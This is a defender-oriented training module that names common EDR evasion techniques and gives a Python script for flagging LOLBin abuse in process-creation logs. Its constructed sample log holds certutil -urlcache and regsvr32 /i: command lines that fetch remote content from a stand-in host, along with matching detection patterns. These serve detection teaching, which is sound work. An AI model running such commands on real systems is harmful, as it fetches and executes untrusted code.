Module 12 · EDR Evasion — Defender View

Manish Garg, Associate of (ISC)² · RingSafe
Apr 27, 2026

Last updated: April 29, 2026


Modern EDRs (CrowdStrike, SentinelOne, Defender for Endpoint, Carbon Black) hook into both kernel and user space. Attackers have evolved evasion techniques in response. Knowing those techniques helps defenders evaluate their own detection coverage.

Common evasion techniques

  • Process injection variants — APC injection, atom bombing, CTRL injection, NtMapViewOfSection. Each is designed to evade signature-based hooks.
  • AMSI bypass — disabling Microsoft’s Antimalware Scan Interface in-process. Many bypasses have been published; vendors patch them and attackers find new ones.
  • ETW patching — disabling Event Tracing for Windows. Lost telemetry leaves defenders blind.
  • Direct syscalls — bypassing user-mode hooks by calling the kernel directly with the SYSCALL instruction.
  • BYOVD (Bring Your Own Vulnerable Driver) — loading a legitimately signed but vulnerable driver and exploiting it for kernel access. EDRtoBlackEDR-style.
  • Living off the Land — using signed Windows binaries (LOLBins) such as certutil, mshta, regsvr32 and bitsadmin.
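
One way to turn the Living off the Land item into detection logic, as an added example that is not part of this module: a small Python pass over constructed process-creation events that flags the four binaries named above when their arguments point at remote content or their parent is an Office application. The field names (Image, ParentImage, CommandLine), the parent list, the pattern labels and the log lines are this example's own assumptions, not vendor detection content.

```python
import re

# The four LOLBins the module names; all are legitimately signed Windows binaries.
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "bitsadmin.exe"}
# Argument patterns that indicate remote-content retrieval rather than routine admin use (labels are this example's own).
SUSPICIOUS_ARGS = {
    "remote_url": re.compile(r"https?://", re.I),
    "certutil_urlcache": re.compile(r"-urlcache", re.I),
    "regsvr32_scriptlet": re.compile(r"/i:\S+", re.I),
    "bits_transfer": re.compile(r"/transfer\b", re.I),
}
# Parents that should rarely launch these binaries (constructed list for this example).
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def basename(path):
    """Lower-cased file name of a Windows path ('C:\\Windows\\x.exe' -> 'x.exe')."""
    return path.lower().rsplit("\\", 1)[-1]


def parse_event(line):
    """Parse a constructed 'key=value|key=value' process-creation line into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))


def evaluate(event):
    """Return the reasons this event looks like LOLBin abuse (empty list if benign)."""
    if basename(event.get("Image", "")) not in LOLBINS:
        return []
    cmd = event.get("CommandLine", "")
    reasons = [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(cmd)]
    parent = basename(event.get("ParentImage", ""))
    if parent in UNUSUAL_PARENTS:
        reasons.append("unusual_parent:" + parent)
    return reasons


def scan(lines):
    """Evaluate each log line; return (image name, reasons) for every hit."""
    events = [parse_event(line) for line in lines]
    return [(basename(e["Image"]), r) for e in events if (r := evaluate(e))]


# Constructed sample events (not real telemetry); example.invalid is a reserved test domain.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=certutil -verify cert.cer",
    "Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Office16\\WINWORD.EXE|CommandLine=certutil -urlcache -f http://example.invalid/a.txt a.txt",
    "Image=C:\\Windows\\System32\\regsvr32.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=regsvr32 /i:http://example.invalid/x.sct",
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad readme.txt",
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_LOG):
        print("ALERT", image, ", ".join(reasons))
```

The benign certutil -verify line and the notepad line produce no hit, which is the point: the binary name alone is not the signal, the arguments and the parent are.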